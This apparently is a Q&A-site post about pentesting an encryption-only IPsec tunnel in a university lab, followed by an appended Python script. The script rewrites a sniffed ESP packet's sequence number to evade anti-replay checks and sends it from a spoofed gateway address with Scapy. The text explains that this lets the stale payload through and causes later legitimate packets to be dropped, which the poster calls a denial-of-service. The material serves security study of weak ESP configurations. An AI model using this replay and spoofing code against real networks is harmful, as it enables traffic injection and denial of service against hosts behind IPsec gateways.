
I'm trying to pentest an IPsec implementation with no auth in tunnel mode for a uni project. After sniffing an ESP packet (which contains an ICMP packet) with Wireshark, the attacker sends the same packet with Scapy to Host A. The problem is that Router A does not forward anything to its Host A.

I am also using Scapy with the ESP implementation from https://github.com/secdev/scapy

This is my configuration:

HOST A: 10.0.1.10

ROUTER A NIC-1: 10.0.1.24
ROUTER A NIC-2: 192.168.100.1

HOST B: 10.0.2.10

ROUTER B NIC-1: 10.0.2.24
ROUTER B NIC-2: 192.168.100.2

ATTACKER: 192.168.100.3

After I use sendp from the ATTACKER machine, I see the ESP packet on Router A:

06:03:03.088236 IP 192.168.100.2 > Tirith: ESP(spi=0xc18c8ed9,seq=0x1b), length 120

Sadly, nothing happens on HOST A.

I can do the same thing without ESP, with a simple ICMP packet, and everything works: Router A gets the packet and forwards it to HOST A, so it seems that the interface is also set correctly. Am I missing something here?

Kuze

    Does Router A use replay protection? Did you change the sequence number? The latter will only work if there really is no integrity protection (although ESP without it is rarely used, if at all). – ecdsa Dec 11 '20 at 09:14
  • Yeah, it was the replay protection that I forgot; I have momentarily deactivated it and it works. Now I have to figure out how to change it with Scapy. That's what I'm trying to achieve, by the way: a denial-of-service attack on a host behind an IPsec gateway without integrity protection, to prove the vulnerability of encryption-only protocols. – Kuze Dec 11 '20 at 15:42

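The step the comments converge on, rewriting the ESP sequence number before replaying, as an added example (this is not code from the question's author, from Scapy or from any IPsec stack). It parses the 8-byte ESP header (SPI and sequence number are always in the clear), bumps the sequence number while leaving the ciphertext untouched, and runs the result through a receiver-side anti-replay window modelled on RFC 4303 to show why the byte-for-byte replay is dropped and the bumped one is not. The SPI, sequence number and packet length come from the tcpdump line above; the payload bytes are constructed placeholders, and the `send_with_scapy` helper (Scapy's layer-3 `send` with a spoofed Router B source, as in the question's lab) is an assumption about how the packet is put on the wire:

```python
"""Replay an encryption-only ESP packet with a rewritten sequence number.

ESP (RFC 4303) carries a 4-byte SPI and a 4-byte sequence number in the
clear, followed by the encrypted payload and, only when integrity
protection is enabled, an ICV.  Without an ICV nothing binds the sequence
number to the ciphertext, so an attacker can move it past the receiver's
anti-replay window and the gateway decrypts and forwards the stale payload.
"""
import struct
from typing import Dict, Tuple

ESP_HDR = struct.Struct("!II")  # SPI, sequence number (network byte order)

# Constructed sample: SPI and seq from the tcpdump line in the question, plus
# 112 bytes of placeholder "ciphertext" (8 + 112 = 120 bytes, matching the
# captured length).  A real run copies the payload bytes out of Wireshark.
CAPTURED_ESP = ESP_HDR.pack(0xC18C8ED9, 0x1B) + bytes(
    (i * 37 + 11) & 0xFF for i in range(112)
)


def parse_esp(pkt: bytes) -> Tuple[int, int, bytes]:
    """Split an ESP datagram into (spi, seq, payload incl. any trailing ICV)."""
    if len(pkt) < ESP_HDR.size:
        raise ValueError("ESP datagram shorter than its 8-byte header")
    spi, seq = ESP_HDR.unpack_from(pkt, 0)
    return spi, seq, pkt[ESP_HDR.size:]


def rewrite_seq(pkt: bytes, new_seq: int) -> bytes:
    """Copy of pkt with only the sequence number replaced (32-bit wrap)."""
    spi, _, payload = parse_esp(pkt)
    return ESP_HDR.pack(spi, new_seq & 0xFFFFFFFF) + payload


class ReplayWindow:
    """Receiver-side sliding anti-replay window (RFC 4303 Appendix A style,
    32-bit sequence numbers, no ESN).  Models the check Router A applies."""

    def __init__(self, size: int = 64) -> None:
        self.size = size
        self.last = 0    # highest sequence number accepted so far
        self.bitmap = 0  # bit i set  <=>  (last - i) has been seen

    def check_and_update(self, seq: int) -> bool:
        """True if seq is accepted: newer than the window, or inside it and unseen."""
        if seq == 0:
            return False  # 0 is never a valid counter value
        if seq > self.last:  # right of the window: slide it forward
            shift = seq - self.last
            mask = (1 << self.size) - 1
            self.bitmap = ((self.bitmap << shift) | 1) & mask
            self.last = seq
            return True
        diff = self.last - seq
        if diff >= self.size:  # left of the window: too old
            return False
        if (self.bitmap >> diff) & 1:  # inside the window but already seen
            return False
        self.bitmap |= 1 << diff
        return True


def demo_replay(captured: bytes, bump: int = 1000) -> Dict[str, bool]:
    """Play the question's scenario against a fresh window:
    1. the gateway forwarded the sniffed packet once (accepted),
    2. the attacker replays it byte-for-byte (rejected as a duplicate),
    3. the attacker bumps seq by `bump` and replays (accepted, payload intact)."""
    window = ReplayWindow()
    _, seq, _ = parse_esp(captured)
    original = window.check_and_update(seq)
    naive_replay = window.check_and_update(seq)
    bumped = rewrite_seq(captured, seq + bump)
    _, new_seq, _ = parse_esp(bumped)
    bumped_replay = window.check_and_update(new_seq)
    return {
        "original_accepted": original,
        "naive_replay_accepted": naive_replay,
        "bumped_replay_accepted": bumped_replay,
        "ciphertext_unchanged": bumped[ESP_HDR.size:] == captured[ESP_HDR.size:],
    }


def send_with_scapy(esp_bytes: bytes, src: str, dst: str) -> None:
    """Put the rewritten datagram on the wire with Scapy (assumed installed;
    imported lazily so the rest of the file runs without it).  src is the
    spoofed address of Router B, dst is Router A, as in the question's lab."""
    from scapy.all import IP, Raw, send  # Scapy layer-3 send, needs root
    send(IP(src=src, dst=dst, proto=50) / Raw(load=esp_bytes))  # proto 50 = ESP


if __name__ == "__main__":
    print(demo_replay(CAPTURED_ESP))
    # send_with_scapy(rewrite_seq(CAPTURED_ESP, 0x1B + 1000),
    #                 "192.168.100.2", "192.168.100.1")
```

Two things to keep in mind when running it for real. The bump has to be larger than the number of packets the SA has sent since the capture, otherwise the new sequence number can land left of the window and is dropped as too old; the acceptance test is a decrypted ICMP appearing on Router A's 10.0.1.24 side headed for 10.0.1.10. And once the gateway accepts the bumped number, the legitimate packet that later carries that number is rejected as a duplicate, which is the denial-of-service angle mentioned in the comments. On an SA with an ICV the rewritten packet fails integrity verification, so this only works for the encryption-only configuration the question describes.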
0 Answers